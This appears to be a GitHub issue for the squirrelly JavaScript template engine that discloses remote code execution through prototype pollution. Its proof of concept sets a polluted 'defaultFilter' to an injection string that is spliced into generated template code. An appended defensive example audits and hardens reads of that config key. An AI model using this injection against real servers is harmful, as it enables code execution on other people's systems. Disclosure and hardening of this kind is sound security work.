squirrellyjs / squirrelly

Semi-embedded JS template engine that supports helpers, filters, partials, and template inheritance. 4KB minzipped, written in TypeScript ⛺
https://squirrelly.js.org
MIT License

RCE when combined with Prototype Pollution #233

Open sayoojbkumar opened 2 years ago

sayoojbkumar commented 2 years ago

RCE when combined with Prototype Pollution. squirrelly-js is vulnerable to RCE when Prototype Pollution exists. An attacker can have control over defaultFilter, which leads to RCE.

To Reproduce

test.js

const express = require('express')
var sqrl = require('squirrelly')
const app = express()
const port = 8000

constructor.prototype.defaultFilter = "e')); console.log('RCE') //"; // prototype pollution

app.set('views', __dirname);
app.set('view engine', 'squirrelly')
app.get('/', (req, res) => {
   res.render('index.squirrelly', {'testValue':'test'})
})

app.listen(port, () => {})
module.exports = app;

index.squirrelly

<html>
    <head>
        <title>RCE via pp</title>
    </head>
    <body>
        <p>{{it.testValue}}</p>
    </body>
</html>

Screenshots

[Screenshot from 2021-08-15 16-48-46 not reproduced]

Package & Environment Details
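Added example, not part of the issue report and not Squirrelly's own code. The payload above works because the engine reads defaultFilter from its config object, resolves it through the prototype chain, and splices the string into generated template source as if it were a filter name. The two checks below (own-property test plus identifier-shape test) show what a defensive read of such a config key looks like; CODEGEN_KEYS and the helper names are assumptions for illustration, and the "polluted" config simulates the pollution on a private prototype rather than on the global Object.prototype.

```javascript
// Config keys whose values end up inside generated code. 'defaultFilter' is the
// key named in the issue; the list itself is an assumption for illustration.
const CODEGEN_KEYS = ['defaultFilter'];
const IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]*$/;

// Audits a config object and returns a list of findings (empty = nothing found).
function auditTemplateConfig(config) {
  const findings = [];
  for (const key of CODEGEN_KEYS) {
    const value = config[key];
    if (value === undefined || value === false) continue; // filter disabled, nothing to splice
    if (!Object.prototype.hasOwnProperty.call(config, key)) {
      findings.push(`${key}: inherited value ${JSON.stringify(value)} (prototype pollution?)`);
    }
    if (typeof value !== 'string' || !IDENTIFIER.test(value)) {
      findings.push(`${key}: value ${JSON.stringify(value)} is not a bare identifier`);
    }
  }
  return findings;
}

// Hardened read for a code generator: returns the filter name only when it is an
// own, identifier-shaped string; otherwise null, meaning "apply no default filter".
function safeDefaultFilter(config) {
  if (!Object.prototype.hasOwnProperty.call(config, 'defaultFilter')) return null;
  const value = config.defaultFilter;
  return typeof value === 'string' && IDENTIFIER.test(value) ? value : null;
}

// Constructed inputs. pollutedConfig simulates a polluted Object.prototype by
// placing the issue's payload on a private prototype, so the example has no
// global side effects.
const cleanConfig = { defaultFilter: 'e' };
const pollutedProto = { defaultFilter: "e')); console.log('RCE') //" };
const pollutedConfig = Object.create(pollutedProto);

console.log(auditTemplateConfig(cleanConfig));    // []
console.log(auditTemplateConfig(pollutedConfig)); // two findings
console.log(safeDefaultFilter(pollutedConfig));   // null
```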